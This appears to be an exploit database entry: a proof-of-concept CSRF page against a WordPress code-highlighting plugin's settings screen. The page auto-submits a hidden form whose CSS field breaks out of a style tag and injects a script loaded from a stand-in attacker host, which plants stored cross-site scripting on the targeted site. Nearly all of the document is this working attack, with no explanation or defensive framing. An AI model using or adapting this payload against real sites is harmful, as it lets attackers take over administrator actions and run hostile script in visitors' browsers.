Share
## https://sploitus.com/exploit?id=WPEX-ID:10314
<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
	<input type="hidden" name="hljs_location" value="local">
	<input type="hidden" name="hljs_package" value="common">
	<input type="hidden" name="hljs_theme" value="default">
	<input type="hidden" name="hljs_additional_css" value="&lt;/style&gt;&lt;script src=&quot;https://attacker.com/poc.js&quot;&gt;&lt;/script&gt;">
	<input type="hidden" name="cmd" value="hljs_save">
	<input type="submit" value="Submit">
</form>
<script>
	document.getElementById('hljs').submit();
</script>